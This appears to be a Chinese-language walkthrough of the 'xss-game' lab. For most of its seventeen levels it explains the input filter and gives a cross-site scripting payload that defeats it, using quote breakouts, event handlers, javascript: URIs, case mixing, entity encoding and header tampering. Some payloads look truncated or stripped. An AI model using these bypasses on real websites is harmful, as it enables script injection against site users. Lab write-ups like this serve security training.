xss-game


level1


level2

用户输入在input标签value属性中变成了字符串,闭合双引号和input标签即可

">

level3

对<>作了特殊字符html转义,但''引号可以使用,用'闭合input标签的value属性字符串,为input标签添加onmouseover鼠标在元素上的移动属性

' onmousemove='alert(1)

level4

同level3,input标签的value属性用双引号闭合

" onmousemove="alert(1)

level5

对script和on做了过滤,使用伪协议

">xss

level6

对href也做了过滤,但是没有过滤大小写

" oNmousemove="alert(1)

level7

尝试使用script标签,发现script被删掉,剩余的正常,双写绕过

">alert(1)

level8

对javascript做了过滤,使用html实体编码

javascript:alert(1)

level9

输入的网址内必须要有http://,否则判断为不合法,直接将http://放入alert内

javascript:alert('http://')

level10

有三个隐藏的input标签,第三个的t_sort属性值是可以通过在url中构造参数修改的,修改标签,取消隐藏属性,增加鼠标事件

t_sort="type="text"%20%20onmousemove="alert(1)

level11

有一个隐藏的input标签的value属性是值 html请求头中的reference(源地址)属性值,修改请求头

level12

有一个隐藏的input标签的value属性是值 html请求头中的user-agent属性值,修改请求头

level13

请求头中有set-cookies,修改之

level14

页面有一个ifarame标签请求了http://www.exifviewer.org/获得响应文本显示在网页上,使用burpsuite修改返回的文本

level15

ng-include用于加载外部html内容作为子节点

src="level1.php?name="

level16

对script和空格做了过滤,使用%0d回车代替空格

keyword=

level17

第二个参数加空格后将作为embed的属性

arg01=a&arg02=%20onmouseover=alert()